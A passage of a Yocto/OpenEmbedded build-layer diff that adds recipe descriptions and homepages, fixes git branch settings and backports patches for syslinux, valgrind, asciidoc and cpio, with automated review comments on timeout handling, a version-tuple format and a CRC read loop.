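+Upstream-Status: Pending
+RP 2021/3/1
+
+Index: syslinux-6.04-pre2/mk/lib.mk
+===================================================================
+--- syslinux-6.04-pre2.orig/mk/lib.mk
++++ syslinux-6.04-pre2/mk/lib.mk
+@@ -130,8 +130,8 @@ LIBENTRY_OBJS = \
+ exit.o
+
+ LIBGCC_OBJS = \
+- $(patsubst $(com32)/lib/%.c,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.c)) \
+- $(patsubst $(com32)/lib/%.S,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.S))
++ $(sort $(patsubst $(com32)/lib/%.c,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.c))) \
++ $(sort $(patsubst $(com32)/lib/%.S,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.S)))
+
+ LIBCONSOLE_OBJS = \
+ \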
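--- a/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb
+++ b/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Multi-purpose linux bootloader"
 HOMEPAGE = "http://www.syslinux.org/"
+DESCRIPTION = "The Syslinux Project covers lightweight bootloaders for MS-DOS FAT filesystems (SYSLINUX), network booting (PXELINUX), bootable "El Torito" CD-ROMs (ISOLINUX), and Linux ext2/ext3/ext4 or btrfs filesystems (EXTLINUX). The project also includes MEMDISK, a tool to boot legacy operating systems (such as DOS) from nontraditional media; it is usually used in conjunction with PXELINUX and ISOLINUX."
 LICENSE = "GPLv2+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
  file://README;beginline=35;endline=41;md5=558f2c71cb1fb9ba511ccd4858e48e8a"
@@ -22,11 +23,16 @@ SRC_URI = "https://www.zytor.com/pub/syslinux/Testing/6.04/syslinux-${PV}.tar.xz
  file://0009-linux-syslinux-implement-install_bootblock.patch \
  file://0010-Workaround-multiple-definition-of-symbol-errors.patch \
  file://0001-install-don-t-install-obsolete-file-com32.ld.patch \
+ file://determinism.patch \
  "
 
 SRC_URI[md5sum] = "2b31c78f087f99179feb357da312d7ec"
 SRC_URI[sha256sum] = "4441a5d593f85bb6e8d578cf6653fb4ec30f9e8f4a2315a3d8f2d0a8b3fadf94"
 
+# remove at next version upgrade or when output changes
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
+
 UPSTREAM_CHECK_URI = "https://www.zytor.com/pub/syslinux/"
 UPSTREAM_CHECK_REGEX = "syslinux-(?P<pver>.+)\.tar"
 UPSTREAM_VERSION_UNKNOWN = "1"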
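--- a/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb
+++ b/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb
@@ -1,8 +1,14 @@
+SUMMARY = "Boot performance graphing tool"
+DESCRIPTION = "For systemd-bootchart, several proc debug interfaces are required in the kernel config: \
+ CONFIG_SCHEDSTATS \
+below is optional, for additional info: \
+ CONFIG_SCHED_DEBUG"
+HOMEPAGE = "https://github.com/systemd/systemd-bootchart"
 LICENSE = "LGPLv2.1 & GPLv2"
 LIC_FILES_CHKSUM = "file://LICENSE.LGPL2.1;md5=4fbd65380cdd255951079008b364516c \
  file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe"
 
-SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https \
+SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https;branch=master \
  file://0001-architecture-Recognise-RISCV-32-RISCV-64.patch \
  file://mips64.patch \
 "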
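--- a/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
+++ b/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Target Communication Framework for the Eclipse IDE"
 HOMEPAGE = "http://wiki.eclipse.org/TCF"
+DESCRIPTION = "TCF is a vendor-neutral, lightweight, extensible network protocol mainly for communicating with embedded systems (targets)."
 BUGTRACKER = "https://bugs.eclipse.org/bugs/"
 
 LICENSE = "EPL-1.0 | EDL-1.0"
@@ -9,7 +10,7 @@ SRCREV = "a022ef2f1acfd9209a1bf792dda14ae4b0d1b60f"
 PV = "1.7.0+git${SRCPV}"
 
 UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
-SRC_URI = "git://git.eclipse.org/gitroot/tcf/org.eclipse.tcf.agent \
+SRC_URI = "git://git.eclipse.org/r/tcf/org.eclipse.tcf.agent.git;protocol=https;branch=master \
  file://fix_ranlib.patch \
  file://ldflags.patch \
  file://tcf-agent.init \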
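--- a/meta/recipes-devtools/tcltk/tcl_8.6.10.bb
+++ b/meta/recipes-devtools/tcltk/tcl_8.6.10.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Tool Command Language"
 HOMEPAGE = "http://tcl.sourceforge.net"
+DESCRIPTION = "Tool Command Language, is an open-source multi-purpose C library which includes a powerful dynamic scripting language. Together they provide ideal cross-platform development environment for any programming project."
 SECTION = "devel/tcltk"
 
 # http://www.tcl.tk/software/tcltk/license.html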
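--- a/meta/recipes-devtools/unfs3/unfs3_git.bb
+++ b/meta/recipes-devtools/unfs3/unfs3_git.bb
@@ -2,6 +2,7 @@ SUMMARY = "Userspace NFS server v3 protocol"
 DESCRIPTION = "UNFS3 is a user-space implementation of the NFSv3 server \
 specification. It provides a daemon for the MOUNT and NFS protocols, which \
 are used by NFS clients for accessing files on the server."
+HOMEPAGE = "https://github.com/unfs3/unfs3"
 SECTION = "console/network"
 LICENSE = "unfs3"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=9475885294e17c0cc0067820d042792e"
@@ -13,7 +14,7 @@ DEPENDS_append_class-nativesdk = " flex-nativesdk"
 ASNEEDED = ""
 
 S = "${WORKDIR}/git"
-SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https \
+SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https;branch=master \
  file://unfs3_parallel_build.patch \
  file://alternate_rpc_ports.patch \
  file://fix_pid_race_parent_writes_child_pid.patch \
@@ -35,7 +36,7 @@ BBCLASSEXTEND = "native nativesdk"
 inherit autotools
 EXTRA_OECONF_append_class-native = " --sbindir=${bindir}"
 CFLAGS_append = " -I${STAGING_INCDIR}/tirpc"
-LDFLAGS_append = " -ltirpc"
+EXTRA_OECONF_append = " LIBS=-ltirpc"
 
 # Turn off these header detects else the inode search
 # will walk entire file systems and this is a real problem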
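--- a/meta/recipes-devtools/unifdef/unifdef_2.12.bb
+++ b/meta/recipes-devtools/unifdef/unifdef_2.12.bb
@@ -2,6 +2,7 @@ SUMMARY = "Selectively remove #ifdef statements from sources"
 SECTION = "devel"
 LICENSE = "BSD-2-Clause"
 HOMEPAGE = "http://dotat.at/prog/unifdef/"
+DESCRIPTION = "The unifdef utility selectively processes conditional C preprocessor #if and #ifdef directives. It removes from a file both the directives and the additional text that they delimit, while otherwise leaving the file alone."
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=3498caf346f6b77934882101749ada23 \
  file://unifdef.c;endline=32;md5=6f4ee8085d6e6ab0f7cb4390e1a9c497 \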
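--- a/meta/recipes-devtools/vala/vala.inc
+++ b/meta/recipes-devtools/vala/vala.inc
@@ -1,4 +1,5 @@
 SUMMARY = "C#-like programming language for easing GObject programming"
+HOMEPAGE = "http://vala-project.org"
 DESCRIPTION = "Vala is a C#-like language dedicated to ease GObject programming. \
 Vala compiles to plain C and has no runtime environment nor penalities whatsoever."
 SECTION = "devel"
@@ -12,7 +13,6 @@ DEPENDS_append_class-target = " ${@bb.utils.contains('DISTRO_FEATURES', 'api-doc
 # vala-native contains a native version of vapigen, which we use instead of the target one
 DEPENDS_append_class-target = " vala-native"
 BBCLASSEXTEND = "native"
-HOMEPAGE = "http://vala-project.org"
 LICENSE = "LGPLv2.1"
 LIC_FILES_CHKSUM = "file://COPYING;md5=fbc093901857fcd118f065f900982c24"
 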
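--- a/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch
+++ b/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch
@@ -19,6 +19,11 @@ Upstream-Status: Pending
 Signed-off-by: Dave Lerner <dave.lerner@windriver.com>
 Signed-off-by: Tudor Florea <tudor.florea@enea.com>
 Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+
+Increase time limit to 90 s.
+(double of the expected time of drd/tests/std_list on qemuarm64)
+
+Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com>
 ---
  tests/vg_regtest.in | 75 +++++++++++++++++++++++++++++++++++++++--------------
  1 file changed, 55 insertions(+), 20 deletions(-)
@@ -66,7 +71,7 @@ index a441f42..cb05b52 100755
  # Since most of the program time is spent in system() calls, need this to
  # propagate a Ctrl-C enabling us to quit.
 -sub mysystem($)
-+# Enforce 30 seconds limit for the test.
++# Enforce 90 seconds limit for the test.
 +# This resume execution of the remaining tests if valgrind hangs.
 +sub mysystem($)
  {
@@ -76,7 +81,7 @@ index a441f42..cb05b52 100755
 + my $exit_code=0;
 + eval {
 + local $SIG{'ALRM'} = sub { die "timed out\n" };
-+ alarm(30);
++ alarm(90);
 + $exit_code = system($_[0]);
 + alarm (0);
 + ($exit_code == 2) and die "SIGINT\n"; # 2 is SIGINT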
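Review bot: The ALRM handler in mysystem() only dies out of the eval; nothing in the visible lines signals the process started by `system($_[0])`, so a test that hangs past the limit presumably keeps running and holding CPU and memory while the harness moves on. Raising the limit from 30 to 90 seconds does not change that, but it triples how long each stuck child stalls the run before it is abandoned. The rest of mysystem() is outside the hunk, so confirm whether the timeout path already reaps the child; if it does not, running the test in its own process group and killing that group on timeout would close the gap. The limit is also a bare literal repeated in the comment and in `alarm(90)`; a single `my $test_timeout = 90;` used by both would keep them in step.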
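--- a/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64
+++ b/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64
@@ -120,6 +120,7 @@ drd/tests/tc19_shadowmem
 drd/tests/tc21_pthonce
 drd/tests/tc22_exit_w_lock
 drd/tests/tc23_bogus_condwait
+gdbserver_tests/hginfo
 helgrind/tests/annotate_rwlock
 helgrind/tests/annotate_smart_pointer
 helgrind/tests/bar_bad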
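--- a/meta/recipes-devtools/valgrind/valgrind/remove-for-all
+++ b/meta/recipes-devtools/valgrind/valgrind/remove-for-all
@@ -1,2 +1,4 @@
 drd/tests/bar_bad
 drd/tests/bar_bad_xml
+gdbserver_tests/hginfo
+memcheck/tests/linux/timerfd-syscall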
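--- a/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb
+++ b/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Valgrind memory debugger and instrumentation framework"
 HOMEPAGE = "http://valgrind.org/"
+DESCRIPTION = "Valgrind is an instrumentation framework for building dynamic analysis tools. There are Valgrind tools that can automatically detect many memory management and threading bugs, and profile your programs in detail."
 BUGTRACKER = "http://valgrind.org/support/bug_reports.html"
 LICENSE = "GPLv2 & GPLv2+ & BSD"
 LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
@@ -106,7 +107,7 @@ VALGRINDARCH_mipsel = "mips32"
 VALGRINDARCH_mips64el = "mips64"
 VALGRINDARCH_powerpc = "ppc"
 VALGRINDARCH_powerpc64 = "ppc64"
-VALGRINDARCH_powerpc64el = "ppc64le"
+VALGRINDARCH_powerpc64le = "ppc64le"
 
 INHIBIT_PACKAGE_STRIP_FILES = "${PKGD}${libdir}/valgrind/vgpreload_memcheck-${VALGRINDARCH}-linux.so"
 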
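--- a/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb
+++ b/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb
@@ -1,5 +1,6 @@
 SUMMARY = "A shell-script tool for converting XML files to various formats"
-HOMEPAGE = "https://releases.pagure.org/xmlto/"
+HOMEPAGE = "https://pagure.io/xmlto"
+DESCRIPTION = "Utility xmlto is a simple shell-script tool for converting XML files to various formats. It serves as easy to use command line frontend to make fine output without remembering many long options and searching for the syntax of the backends."
 SECTION = "docs/xmlto"
 LICENSE = "GPLv2"
 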
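--- /dev/null
+++ b/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch
@@ -0,0 +1,42 @@
+From 44d2d6095246124c024230f89c1029794491839f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Miro=20Hron=C4=8Dok?= <miro@hroncok.cz>
+Date: Fri, 30 Oct 2020 15:10:35 +0100
+Subject: [PATCH] Properly detect and compare Python version 3.10+ (#151)
+
+Upstream commit: https://github.com/asciidoc-py/asciidoc-py/commit/44d2d6095246124c024230f89c1029794491839f
+
+Slightly modified to cleanly apply to asciidoc 8.6.9:
+- VERSION and MIN_PYTHON_VERSION changed to reflect values in 8.6.9
+- line numbers corrected to eliminate offset warnings
+
+Upstream-Status: Backport
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ asciidoc.py | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/asciidoc.py b/asciidoc.py
+index f960e7d8..42868c4b 100755
+--- a/asciidoc.py
++++ b/asciidoc.py
+@@ -30,7 +30,7 @@
+ # Used by asciidocapi.py #
+ VERSION = '8.6.10' # See CHANGELOG file for version history.
+
+-MIN_PYTHON_VERSION = '3.4' # Require this version of Python or better.
++MIN_PYTHON_VERSION = (3, 4) # Require this version of Python or better.
+
+ # ---------------------------------------------------------------------------
+ # Program constants.
+@@ -4704,8 +4704,8 @@ def init(self, cmd):
+ directory.
+ cmd is the asciidoc command or asciidoc.py path.
+ """
+- if float(sys.version[:3]) < float(MIN_PYTHON_VERSION):
+- message.stderr('FAILED: Python %s or better required' % MIN_PYTHON_VERSION)
++ if sys.version_info[:2] < MIN_PYTHON_VERSION:
++ message.stderr('FAILED: Python %d.%d or better required' % MIN_PYTHON_VERSION)
+ sys.exit(1)
+ if not os.path.exists(cmd):
+ message.stderr('FAILED: Missing asciidoc command: %s' % cmd)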
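Review bot: The patched `MIN_PYTHON_VERSION` changes type from a string to a tuple, but its comment does not say so, and the new `'%d.%d' % MIN_PYTHON_VERSION` format only works while the tuple has exactly two integer elements. I would record that contract at the definition, e.g. `MIN_PYTHON_VERSION = (3, 4)  # (major, minor) tuple; compared against sys.version_info[:2]`. Any other reader of the constant outside these two hunks that still expects a string would need the same update; none is visible here, and init() continues past the hunk. The description also says VERSION was adjusted to the 8.6.9 values while the context line shows `VERSION = '8.6.10'`, which is worth checking against the pinned SRCREV.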
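--- a/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
+++ b/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
@@ -8,8 +8,9 @@ LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=8ca43cbc842c2336e835926c2166c28b \
  file://COPYRIGHT;md5=029ad5428ba5efa20176b396222d4069"
 
-SRC_URI = "git://github.com/asciidoc/asciidoc-py3;protocol=https \
- file://auto-catalogs.patch"
+SRC_URI = "git://github.com/asciidoc/asciidoc-py;protocol=https;branch=main \
+ file://auto-catalogs.patch \
+ file://detect-python-version.patch"
 SRCREV = "618f6e6f6b558ed1e5f2588cd60a5a6b4f881ca0"
 PV .= "+py3-git${SRCPV}"
 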
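--- a/meta/recipes-extended/bash/bash.inc
+++ b/meta/recipes-extended/bash/bash.inc
@@ -1,5 +1,6 @@
 SUMMARY = "An sh-compatible command language interpreter"
 HOMEPAGE = "http://tiswww.case.edu/php/chet/bash/bashtop.html"
+DESCRIPTION = "Bash is the GNU Project's Bourne Again SHell, a complete implementation of the IEEE POSIX and Open Group shell specification with interactive command line editing, job control on architectures that support it, csh-like features such as history substitution and brace expansion, and a slew of other features."
 SECTION = "base/shell"
 
 DEPENDS = "ncurses bison-native virtual/libiconv"
@@ -48,6 +49,11 @@ do_compile_ptest () {
  oe_runmake buildtest
 }
 
+do_install_prepend () {
+ # Ensure determinism as this counter increases for each make call
+ rm -f ${B}/.build
+}
+
 do_install_append () {
  # Move /usr/bin/bash to /bin/bash, if need
  if [ "${base_bindir}" != "${bindir}" ]; then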
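--- a/meta/recipes-extended/bc/bc_1.07.1.bb
+++ b/meta/recipes-extended/bc/bc_1.07.1.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Arbitrary precision calculator language"
 HOMEPAGE = "http://www.gnu.org/software/bc/bc.html"
+DESCRIPTION = "bc is an arbitrary precision numeric processing language. Syntax is similar to C, but differs in many substantial areas. It supports interactive execution of statements."
 
 LICENSE = "GPLv3+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
@@ -31,4 +32,4 @@ do_compile_prepend() {
 ALTERNATIVE_${PN} = "bc dc"
 ALTERNATIVE_PRIORITY = "100"
 
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"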
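--- a/meta/recipes-extended/bzip2/bzip2/Makefile.am
+++ b/meta/recipes-extended/bzip2/bzip2/Makefile.am
@@ -1,6 +1,6 @@
 
 lib_LTLIBRARIES = libbz2.la
-libbz2_la_LDFLAGS = -version-info 1:6:0
+libbz2_la_LDFLAGS = -version-info 1:8:0
 
 libbz2_la_SOURCES = blocksort.c \
  huffman.c \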
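--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch
@@ -0,0 +1,58 @@
+From d257e47a6c6b41ba727b196ac96c05ab91bd9d65 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Fri, 7 Apr 2023 11:23:37 +0300
+Subject: [PATCH 3/4] Fix calculation of CRC in copy-out mode.
+
+* src/copyout.c (read_for_checksum): Fix type of the file_size argument.
+Rewrite the reading loop.
+
+Original patch by Stefano Babic <sbabic@denx.de>
+
+Upstream-Status: Backport [a1b2f7871c3ae5113e0102b870b15ea06a8f0e3d]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+ src/copyout.c | 16 +++++++---------
+ 1 file changed, 7 insertions(+), 9 deletions(-)
+
+diff --git a/src/copyout.c b/src/copyout.c
+index 8b0beb6..f1ff351 100644
+--- a/src/copyout.c
++++ b/src/copyout.c
+@@ -34,27 +34,25 @@
+ compute and return a checksum for them. */
+
+ static uint32_t
+-read_for_checksum (int in_file_des, int file_size, char *file_name)
++read_for_checksum (int in_file_des, off_t file_size, char *file_name)
+ {
+ uint32_t crc;
+- char buf[BUFSIZ];
+- int bytes_left;
+- int bytes_read;
+- int i;
++ unsigned char buf[BUFSIZ];
++ ssize_t bytes_read;
++ ssize_t i;
+
+ crc = 0;
+
+- for (bytes_left = file_size; bytes_left > 0; bytes_left -= bytes_read)
++ while (file_size > 0)
+ {
+ bytes_read = read (in_file_des, buf, BUFSIZ);
+ if (bytes_read < 0)
+ error (PAXEXIT_FAILURE, errno, _("cannot read checksum for %s"), file_name);
+ if (bytes_read == 0)
+ break;
+- if (bytes_left < bytes_read)
+- bytes_read = bytes_left;
+- for (i = 0; i < bytes_read; ++i)
++ for (i = 0; i < bytes_read; i++)
+ crc += buf[i] & 0xff;
++ file_size -= bytes_read;
+ }
+ if (lseek (in_file_des, 0L, SEEK_SET))
+ error (PAXEXIT_FAILURE, errno, _("cannot read checksum for %s"), file_name);
+--
+2.39.2
+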
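Review bot: The rewritten loop in read_for_checksum() no longer clamps the last chunk to the bytes still expected, so if read() returns more than the remaining `file_size` (a file that grew after its size was taken), the surplus bytes are summed into the CRC. The removed `if (bytes_left < bytes_read) bytes_read = bytes_left;` guarded against exactly that; the equivalent for the new code is `if (bytes_read > file_size) bytes_read = file_size;` placed before the summing loop. How many bytes the archive body is written with is not visible in this hunk, but if it is limited to the recorded size, the stored checksum would not match the stored data for such a file and extraction-time verification would fail. The end of the function (its return) lies outside the hunk.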
diff --git a/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch b/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch
new file mode 100644
index 0000000000..c212bddf7d
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch
@@ -0,0 +1,312 @@
1From 8513495ab5cfb63eb7c4c933fdf0b78c6196cd27 Mon Sep 17 00:00:00 2001
2From: Sergey Poznyakoff <gray@gnu.org>
3Date: Fri, 28 Apr 2023 15:23:46 +0300
4Subject: [PATCH 4/4] Fix appending to archives bigger than 2G
5
6* src/extern.h (last_header_start): Change type to off_t.
7* src/global.c: Likewise.
8* src/util.c (prepare_append): Use off_t for file offsets.
9
10Upstream-Status: Backport [0987d63384f0419b4b14aecdc6a61729b75ce86a]
11Signed-off-by: Marek Vasut <marex@denx.de>
12---
13 src/extern.h | 11 ++++-----
14 src/global.c | 2 +-
15 src/util.c | 66 ++++++++++++++++++++++++++--------------------------
16 3 files changed, 39 insertions(+), 40 deletions(-)
17
18diff --git a/src/extern.h b/src/extern.h
19index 11ac6bf..12f14a9 100644
20--- a/src/extern.h
21+++ b/src/extern.h
22@@ -67,7 +67,7 @@ extern int ignore_devno_option;
23
24 extern bool to_stdout_option;
25
26-extern int last_header_start;
27+extern off_t last_header_start;
28 extern int copy_matching_files;
29 extern int numeric_uid;
30 extern char *pattern_file_name;
31@@ -123,7 +123,7 @@ void field_width_error (const char *filename, const char *fieldname,
32
33 /* copypass.c */
34 void process_copy_pass (void);
35-int link_to_maj_min_ino (char *file_name, int st_dev_maj,
36+int link_to_maj_min_ino (char *file_name, int st_dev_maj,
37 int st_dev_min, ino_t st_ino);
38 int link_to_name (char const *link_name, char const *link_target);
39
40@@ -171,7 +171,7 @@ void copy_files_tape_to_disk (int in_des, int out_des, off_t num_bytes);
41 void copy_files_disk_to_tape (int in_des, int out_des, off_t num_bytes, char *filename);
42 void copy_files_disk_to_disk (int in_des, int out_des, off_t num_bytes, char *filename);
43 void warn_if_file_changed (char *file_name, off_t old_file_size,
44- time_t old_file_mtime);
45+ time_t old_file_mtime);
46 void create_all_directories (char const *name);
47 void prepare_append (int out_file_des);
48 char *find_inode_file (ino_t node_num,
49@@ -185,7 +185,7 @@ void set_new_media_message (char *message);
50 #ifdef HPUX_CDF
51 char *add_cdf_double_slashes (char *filename);
52 #endif
53-void write_nuls_to_file (off_t num_bytes, int out_des,
54+void write_nuls_to_file (off_t num_bytes, int out_des,
55 void (*writer) (char *in_buf,
56 int out_des, off_t num_bytes));
57 #define DISK_IO_BLOCK_SIZE 512
58@@ -229,6 +229,5 @@ void delay_set_stat (char const *file_name, struct stat *st,
59 mode_t invert_permissions);
60 int repair_delayed_set_stat (struct cpio_file_stat *file_hdr);
61 void apply_delayed_set_stat (void);
62-
63-int arf_stores_inode_p (enum archive_format arf);
64
65+int arf_stores_inode_p (enum archive_format arf);
66diff --git a/src/global.c b/src/global.c
67index fb3abe9..5c9fc05 100644
68--- a/src/global.c
69+++ b/src/global.c
70@@ -114,7 +114,7 @@ int debug_flag = false;
71
72 /* File position of last header read. Only used during -A to determine
73 where the old TRAILER!!! record started. */
74-int last_header_start = 0;
75+off_t last_header_start = 0;
76
77 /* With -i; if true, copy only files that match any of the given patterns;
78 if false, copy only files that do not match any of the patterns. (-f) */
79diff --git a/src/util.c b/src/util.c
80index 4421b20..3be89a4 100644
81--- a/src/util.c
82+++ b/src/util.c
83@@ -60,8 +60,8 @@ tape_empty_output_buffer (int out_des)
84 static long output_bytes_before_lseek = 0;
85
86 /* Some tape drivers seem to have a signed internal seek pointer and
87- they lose if it overflows and becomes negative (e.g. when writing
88- tapes > 2Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
89+ they lose if it overflows and becomes negative (e.g. when writing
90+ tapes > 2Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
91 seek pointer and prevent it from overflowing. */
92 if (output_is_special
93 && ( (output_bytes_before_lseek += output_size) >= 1073741824L) )
94@@ -106,7 +106,7 @@ static ssize_t sparse_write (int fildes, char *buf, size_t nbyte, bool flush);
95 descriptor OUT_DES and reset `output_size' and `out_buff'.
96 If `swapping_halfwords' or `swapping_bytes' is set,
97 do the appropriate swapping first. Our callers have
98- to make sure to only set these flags if `output_size'
99+ to make sure to only set these flags if `output_size'
100 is appropriate (a multiple of 4 for `swapping_halfwords',
101 2 for `swapping_bytes'). The fact that DISK_IO_BLOCK_SIZE
102 must always be a multiple of 4 helps us (and our callers)
103@@ -188,8 +188,8 @@ tape_fill_input_buffer (int in_des, int num_bytes)
104 {
105 #ifdef BROKEN_LONG_TAPE_DRIVER
106 /* Some tape drivers seem to have a signed internal seek pointer and
107- they lose if it overflows and becomes negative (e.g. when writing
108- tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
109+ they lose if it overflows and becomes negative (e.g. when writing
110+ tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
111 seek pointer and prevent it from overflowing. */
112 if (input_is_special
113 && ( (input_bytes_before_lseek += num_bytes) >= 1073741824L) )
114@@ -332,8 +332,8 @@ tape_buffered_peek (char *peek_buf, int in_des, int num_bytes)
115
116 #ifdef BROKEN_LONG_TAPE_DRIVER
117 /* Some tape drivers seem to have a signed internal seek pointer and
118- they lose if it overflows and becomes negative (e.g. when writing
119- tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
120+ they lose if it overflows and becomes negative (e.g. when writing
121+ tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
122 seek pointer and prevent it from overflowing. */
123 if (input_is_special
124 && ( (input_bytes_before_lseek += num_bytes) >= 1073741824L) )
125@@ -404,7 +404,7 @@ tape_toss_input (int in_des, off_t num_bytes)
126
127 if (crc_i_flag && only_verify_crc_flag)
128 {
129- int k;
130+ int k;
131 for (k = 0; k < space_left; ++k)
132 crc += in_buff[k] & 0xff;
133 }
134@@ -416,14 +416,14 @@ tape_toss_input (int in_des, off_t num_bytes)
135 }
136
137 void
138-write_nuls_to_file (off_t num_bytes, int out_des,
139- void (*writer) (char *in_buf, int out_des, off_t num_bytes))
140+write_nuls_to_file (off_t num_bytes, int out_des,
141+ void (*writer) (char *in_buf, int out_des, off_t num_bytes))
142 {
143 off_t blocks;
144 off_t extra_bytes;
145 off_t i;
146 static char zeros_512[512];
147-
148+
149 blocks = num_bytes / sizeof zeros_512;
150 extra_bytes = num_bytes % sizeof zeros_512;
151 for (i = 0; i < blocks; ++i)
152@@ -603,7 +603,7 @@ create_all_directories (char const *name)
153 char *dir;
154
155 dir = dir_name (name);
156-
157+
158 if (dir == NULL)
159 error (PAXEXIT_FAILURE, 0, _("virtual memory exhausted"));
160
161@@ -637,9 +637,9 @@ create_all_directories (char const *name)
162 void
163 prepare_append (int out_file_des)
164 {
165- int start_of_header;
166- int start_of_block;
167- int useful_bytes_in_block;
168+ off_t start_of_header;
169+ off_t start_of_block;
170+ size_t useful_bytes_in_block;
171 char *tmp_buf;
172
173 start_of_header = last_header_start;
174@@ -697,8 +697,8 @@ inode_val_compare (const void *val1, const void *val2)
175 const struct inode_val *ival1 = val1;
176 const struct inode_val *ival2 = val2;
177 return ival1->inode == ival2->inode
178- && ival1->major_num == ival2->major_num
179- && ival1->minor_num == ival2->minor_num;
180+ && ival1->major_num == ival2->major_num
181+ && ival1->minor_num == ival2->minor_num;
182 }
183
184 static struct inode_val *
185@@ -706,10 +706,10 @@ find_inode_val (ino_t node_num, unsigned long major_num,
186 unsigned long minor_num)
187 {
188 struct inode_val sample;
189-
190+
191 if (!hash_table)
192 return NULL;
193-
194+
195 sample.inode = node_num;
196 sample.major_num = major_num;
197 sample.minor_num = minor_num;
198@@ -734,7 +734,7 @@ add_inode (ino_t node_num, char *file_name, unsigned long major_num,
199 {
200 struct inode_val *temp;
201 struct inode_val *e = NULL;
202-
203+
204 /* Create new inode record. */
205 temp = (struct inode_val *) xmalloc (sizeof (struct inode_val));
206 temp->inode = node_num;
207@@ -1007,7 +1007,7 @@ buf_all_zeros (char *buf, int bufsize)
208
209 /* Write NBYTE bytes from BUF to file descriptor FILDES, trying to
210 create holes instead of writing blockfuls of zeros.
211-
212+
213 Return the number of bytes written (including bytes in zero
214 regions) on success, -1 on error.
215
216@@ -1027,7 +1027,7 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
217
218 enum { begin, in_zeros, not_in_zeros } state =
219 delayed_seek_count ? in_zeros : begin;
220-
221+
222 while (nbytes)
223 {
224 size_t rest = nbytes;
225@@ -1042,7 +1042,7 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
226 if (state == not_in_zeros)
227 {
228 ssize_t bytes = buf - start_ptr + rest;
229-
230+
231 n = write (fildes, start_ptr, bytes);
232 if (n == -1)
233 return -1;
234@@ -1091,8 +1091,8 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
235 if (n != 1)
236 return n;
237 delayed_seek_count = 0;
238- }
239-
240+ }
241+
242 return nwritten + seek_count;
243 }
244
245@@ -1222,7 +1222,7 @@ set_perms (int fd, struct cpio_file_stat *header)
246 if (!no_chown_flag)
247 {
248 uid_t uid = CPIO_UID (header->c_uid);
249- gid_t gid = CPIO_GID (header->c_gid);
250+ gid_t gid = CPIO_GID (header->c_gid);
251 if ((fchown_or_chown (fd, header->c_name, uid, gid) < 0)
252 && errno != EPERM)
253 chown_error_details (header->c_name, uid, gid);
254@@ -1239,13 +1239,13 @@ set_file_times (int fd,
255 const char *name, unsigned long atime, unsigned long mtime)
256 {
257 struct timespec ts[2];
258-
259+
260 memset (&ts, 0, sizeof ts);
261
262 ts[0].tv_sec = atime;
263 ts[1].tv_sec = mtime;
264
265- /* Silently ignore EROFS because reading the file won't have upset its
